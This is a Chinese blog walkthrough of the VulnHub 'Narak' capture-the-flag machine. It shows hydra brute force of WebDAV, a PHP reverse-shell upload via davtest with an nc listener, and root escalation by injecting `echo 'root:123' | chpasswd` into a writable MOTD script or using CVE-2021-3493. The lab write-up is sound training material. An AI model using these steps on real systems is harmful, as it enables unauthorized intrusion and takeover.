打靶记录18——narak

已于 2024-09-26 21:50:02 修改
阅读量1.1k 收藏 22
点赞数 27
分类专栏: 打靶 文章标签: 安全 web安全 网络 服务器 网络安全
于 2024-09-24 16:03:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64422989/article/details/142492447
版权

靶机:

https://download.vulnhub.com/ha/narak.ova

推荐使用 VM Ware 打开靶机

难度:中

目标:取得 root 权限 + 2 Flag

攻击方法:

  • 主机发现
  • 端口扫描
  • 信息收集
  • 密码字典定制
  • 爆破密码
  • Webdav 漏洞
  • PUT 方法上传
  • BF 语言解码
  • MOTD 注入
  • CVE-2021-3493 提权

主机发现

arp-scan -l

尝试发现是192.168.31.26

端口扫描和服务发现

nmap -p- 192.168.31.26

nmap -p22,80 -sV -sC 192.168.31.26

发现开启了 Apache 的服务,然后可能是 Ubuntu 系统

按照惯例查看 80 端口的 Web 页面,发现是一个恐怖的地狱的图片,地狱的大门由一个有着三个头的大狗来看守着

目录扫描

dirsearch -u http://192.168.31.26/

发现了 Webdav 路径

  • Webdav 是一种 Web 技术,可以实现类似于 FTP 那样的传输文件的功能
  • 401状态码表示“未授权”(Unauthorized)。这通常意味着请求需要用户进行身份验证

访问 Webdav 路径发现果然需要认证

dirsearch -u http://192.168.31.26/ -f -e html,txt,php -w /usr/share/wordlists/dirb/common.txt 再扫描一下

  • dirsearch:调用 dirsearch 工具。
  • -u http://192.168.31.26/:指定目标 URL,也就是扫描的目标网站。
  • -f:强制显示所有扫描结果,包括状态码为 404(未找到)的结果。
  • -e html,txt,php:指定要扫描的文件扩展名列表,分别为 .html, .txt, 和 .php
  • -w /usr/share/wordlists/dirb/common.txt:指定字典文件路径,即使用 common.txt 作为词列表来进行扫描。这个文件通常包含常见的目录和文件名。

发现了一个 /tips.txt 文件

要打开地狱的大门就查看这个文件 creds.txt,但是访问了没有,应该是一个误导

暴力破解

  • 密码字典定制
  • cewl 是一个用于从指定 URL 提取单词列表的工具,通常用于创建字典文件以供密码破解等任务使用。

cewl http://192.168.31.26/ -w dict.txt

hydra -L dict.txt -P dict.txt 192.168.31.26 http-get /webdav -v 成功获得一个账号密码 yamdoot Swarg

通过 webdav 的请求方式,通过 PUT 方法,通过 webdav 的服务,可以将本地的 Webshell 上传上去

davtest -url http://192.168.31.26/webdav/ -auth yamdoot:Swarg

  • davtest 是一个用于测试 WebDAV 服务上文件上传和执行漏洞的工具。
  • 执行这个命令后,davtest 将会尝试连接到指定的 WebDAV 服务地址,并使用提供的认证信息进行登录。接着它会尝试上传各种类型的文件,并检查这些文件是否可以成功上传和执行,以评估 WebDAV 服务的安全性。

测试上传了很多文件在路径下都 SUCCEED 成功了

PHP 可以成功解析,说明目标服务器是 PHP 的环境

反弹Shell

直接在 kali 里面用自带的 Webshell上传上去

cp /usr/share/webshells/php/php-reverse-shell.php .

代码里修改,改成 kali 本机的IP

davtest -url http://192.168.1.5/webdav/ -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadloc rev2.php 上传成功(我网络环境改变,所以重新上传了 rev2.php)

刷新一下 webdav 路径就看见 rev.php 了

nc -lvnp 1234 反弹shell

bash -i 或者 python3 -c "import pty;pty.spawn('/bin/bash')" 升级一下 shell

提权

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null这个命令用来查找根目录及其子目录中所有属于root用户的文件,这些文件具有如下权限:用户和组可以执行,其他用户可以写入。

  1. find /: 这个命令表示在根目录(/)下进行查找。
  2. -type f: 这个选项表示只查找文件,不包括目录或其他类型的文件系统对象。
  3. -user root: 这个选项表示只查找属于root用户的文件。
  4. -perm -ug=x,o=w: 这个选项表示查找文件权限中,用户组(u)和群组(g)具有执行权限(x),而其他用户(o)具有写权限(w)的文件。
  5. -exec ls -l '{}' \;: 这个选项表示对每个符合条件的文件执行ls -l命令,以长格式列出文件的详细信息。'{}'是占位符,表示当前找到的文件名。
  6. 2>/dev/null: 这个部分将标准错误输出重定向到/dev/null,以便忽略错误消息。

cat /mnt/hell.sh 然后发现这是一串 Brainfuck 编码

使用在线网址 https://www.splitbrain.org/services/ook 解码,获得 chitragupt 字符串

猜测它是一个密码,尝试登录 inferno 账户成功

收获第一个 flag

方法一:CVE-2021-3493

漏洞利用代码: https://github.com/inspiringz/CVE-2021-3493/tree/master

gcc exp.c -o exp 编译好之后上传到目标服务器的主目录

scp exp inferno@192.168.1.5:~/

  • : 符号将用户名和远程主机地址与目标路径分隔开。
  • ~/ 是目标路径,表示远程主机上用户 inferno 的主目录。~ 是 Unix/Linux 系统中表示用户主目录的快捷方式。

我的 kali 版本太高了,GCC的版本也是

这个错误信息表明你尝试执行的二进制文件 ./exp 依赖于 libc.so.6 库的一个更高版本(GLIBC_2.34),而当前系统上的 libc.so.6 版本较低,无法满足这个依赖。

那我直接把编译好的传过去算了

方法二:MOTD 注入

  • motd 是 message of the day 的缩写

重新运行 find / -type f -user root -perm -ug=x,o=w -exec ls -l ‘{}’ ; 2>/dev/null 看看,发现其他的都是在 /etc/update-motd.d/ 目录下的,都是一些脚本

vi /etc/update-motd.d/00-header

添加 echo ‘root:123’ | chpasswd 修改 root 账号的密码

重新登录的时候,那个脚本(/etc/update-motd.d/00-header)会以root账号的权限来执行

打靶完毕!

Fab1an要努力~
关注
专栏目录
打靶narak
代码审计
04-22 1810
主机发现 nmap -sS 192.168.226.0/24 端口扫描 dirb基于字典的目录扫描工具 发现三个目录 访问该目录 网络存储文件共享之WebDAV 再用hydra爆破以下 或者burpsuite爆破 yamdoot, Swarg .海德拉(Hydra) Medusa(美杜莎) patator msf 都可以 用cewl工具通过爬取网站信息的关键字来生成字典,通过生成的字典进行爆破 用hydra爆破工具爆破 -L指定用户名 -P指定密码 ip地址加协议加路径。http就是网站的协议,
VulnHub narak
weixin_45682839的博客
10-21 1206
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。
vulunhub靶机——narak测试思路
hxh108的博客
06-22 815
1、下载好narak靶机之后,在VM虚拟机中打开,设置网络连接为nat模式,同时设置kali同样为nat模式。
红队打靶Narak打靶思路详解(vulnhub)
Bossfrank的博客
09-02 1175
本文是vulnhub靶机Narak的详细打靶过程,涉及到的知识点包括tftp协议的使用、dav工具的使用、brainfuck语句和motd脚本提权等。知识点很密,需要实操打靶才会有深刻理解。。
Narak靶机打靶过程
qq_64703089的博客
08-03 869
Narak发布日期:23 Sep 2020tips1、目录扫描记得扫 txt、备份文件等2、爆破无果,可以自己通过页面单词整理一份字典3、端口扫描 TCP要是打不进去,看看UDP。
narak靶机打靶过程及思路
qq_52610024的博客
05-19 312
使用hydra进行爆破hydra-Ldict.txt-Pdict.txt10.1.8.133http-get/webdav-v后面的意思是使用http。继续查找文件find/-typef-userroot-perm-ug=x,o=w-execls-l‘{}’;上传反弹shell的php文件/usr/share/webshells/php/php-reverse-shell.php。使用CVE-2021-3493漏洞进行提权,提权成功拿下root账号。...
红队打靶Narak靶机思路讲解(vulnhub)
qq_73413340的博客
08-25 1209
我记得vulnhub的页面对于这个靶机的描述中有这样一句话: 燃烧的墙壁和恶魔无处不在,即使你最信任的工具也会在这次任务中背叛你。不要相信任何人。截至目前,我们用到了哪些工具呢?用nmap进行了主机发现和端口扫描,用gobuster进行了目录爆破。那会不会是我们被工具“背叛”了呢?莫非实际的结果并不是工具显示的那样?先说gobuster,我们进行web目录爆破可以用很多工具,其实没有本质区别,关键还是字典的问题,因此应该不是爆破工具的问题。莫非是nmap端口扫描的结果有误或者遗漏了什么?比如有可能遗漏了某些
narak靶机
2303_79608809的博客
08-02 919
目前我们还没有找到关键的突破点,所以我们下一步需要从扫描目录的点着手。在本次实验中,需要对在不断尝试的过程的靶机的信息足够熟悉并进行一定的猜测,比如:要对creds.txt这个加密文件进行base64解密后得到的明文联想到这可能是/webdav的登录的账号和密码,否则后续的一切渗透流程都很难展开。我们在/home家目录下,看到三个用户,然后在/etc/passwd文件下,看到具有/bin/bash权限的用户,也刚好有这几个,很有可能这几个账户中就有和刚才chitragupt密码匹配ssh的用户。
靶机渗透之narak
weixin_64267091的博客
02-04 1156
在这次靶机渗透过程中,走到漏洞分析阶段路就断了,发现在信息收集部分可能遗漏掉一些重要信息,最后又重点扫描了一些常见的UDP端口,最后扫出来了一个69端口。然后就利用这个服务找到了一个用户名及其密码,成功访问webdav。然后使用davtest测试webdav可以上传和执行哪些文件,发现可以上传并执行php,利用cadaver客户端上传反弹shell的php文件并访问shell.php,然后通过寻找敏感文件初步提权,找到brainfuck代码,用beef工具解码,发现了用户名inferno的ssh密码。
靶机练习 narak ,个人学习心得
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机是 NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
narak靶场
zx_y_123的博客
03-21 162
WebDAV 基于 HTTP 协议的通信协议,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。因为没有任何提示我们用户密码的东西,所有我们采用密码爆破的方式,使用kali自带的字典生成工具cewl获取网站后台数据从而生成字典。常用的文件共享有三种:FTP、Samba、WebDAV,它们各有优缺点,了解后才能更好地根据自己的需求选择方案。
靶机:narak
weixin_50339323的博客
08-04 1638
靶机网址:https://www.vulnhub.com/entry/ha-narak,569/ 目录 一、信息搜集: 二、漏洞利用与探测: 三、提权 一、信息搜集: 获取IP: nmap -sP 192.168.8.0/24 端口扫描: nmap -sV -p- -sC 192.168.8.132 -n -vv 22、80端口均开启 访问192.168.8.132 从页面搜索信息 · 翻译了一下网页内容信息提取关键字或许有用: yamdoot,...
网安新声 | 黎巴嫩BP机爆炸事件带来的安全新挑战与反思
WAJXY2021的博客
09-23 373
黎巴嫩传呼设备爆炸事件迅速在全球范围内掀起广泛讨论,它不仅引发了全球对智能设备安全性的忧虑,更是敲响了警钟:网络世界与物理现实的界限已打破,针对网络空间的攻击能够直接穿透至现实世界,造成实质性的破坏与伤害,为全球安全格局带来了新的挑战与反思。
CVE-2024-1112 Resource Hacker 缓冲区溢出分析
信息安全
09-23 913
CVE-2024-1112 是 Resource Hacker 软件的一个缓冲区溢出漏洞。该漏洞存在于版本 3.6.0.92 中。由于软件在处理命令行中的文件路径时未对文件字符串长度进行限制,过长的字符串参数导致内存被过度写入,从而引发缓冲区溢出。
2024年信息安全企业CRM选型与应用研究报告
weixin_51170096的博客
09-23 964
数字化的生活给人们带来便利的同时也带来一定的信息安全隐患,如网络侵权、泄露用户隐私、黑客攻击等。在互联网高度发展的今天,信息安全与我们每个人、每个组织甚至每个国家都息息相关。信息安全行业蓬勃发展。根据智研咨询数据,2021年,我国信息安全市场规模增长至1825亿元,同比增长21.83%。预计2023年市场规模将达到2294亿元。对信息安全企业而言,在高速增长而又竞争激烈的市场中,
【中关村在线-注册/登录安全分析报告】
最新发布
09-23 928
中关村在线(ZOL)创立于1999年,深耕科技垂直领域23年,致力于新消费势力生活科技商品第一导购平台 ,专业高质量内容的提供者。以用户第一为导向,帮用户买好产品,帮客户卖好产品为使命利用专业领先内容,帮助用户更好、更快的选购产品, 通过产品解析、产品点评、问答口碑、对接电商,简化路径、产品评测完善+ 种草导购推荐等环节,让用户全面了解每一款产品性能,帮助用户更精准、更快捷的选购科技产品。
数据保护从现在开始:如何抵御 .[RestoreBackup@cock.li].SRC 勒索病毒
数据恢复研究℃
09-20 1144
通过综合采取以上预防措施,可以显著降低感染 .[RestoreBackup@cock.li].SRC 、[chewbacca@cock.li].SRC勒索病毒的风险。保持警惕、定期备份数据以及更新安全防护措施是确保数据安全的重要策略。预防永远胜于治疗,积极的安全态度是抵御网络攻击的最佳保障。以下是2024常见传播的勒索病毒,表明勒索病毒正在呈现多样化以及变种迅速地态势发展。
业务安全治理
大河之犬的博客
09-20 1224
Nebula是国内安全公司威胁猎人团队开源的一款风控系统,重点解决恶意注册、账号被盗、内容欺诈三方面的业务安全问题,其系统架构如图所示:风控系统的工作方式:1、数据源层大数据风控的基础在于数据,全面、高质量的数据可以帮助我们准确地进行风险控制。用户基本信息,除了我们所熟知的姓名、身份证、银行卡、手机号外,还有学历信息、收入情况,甚至包含当前设备、当前位置等用户的征信数据,除了人行征信系统外,还有一些其他网贷平台上的逾期或黑名单信息,比如某网贷平台的黑名单数据。
JAVA自助高效安全无人台球茶室棋牌室系统小程序源码
2401_84413903的博客
09-20 813
如果你厌倦了传统娱乐场所的喧嚣与束缚,渴望一种更加自由、高效、安全的娱乐方式,那么“自助高效安全无人台球茶室棋牌室系统”绝对是你的不二之选!快来这里,开启你的未来娱乐新篇章吧!🎉。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Fab1an要努力~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值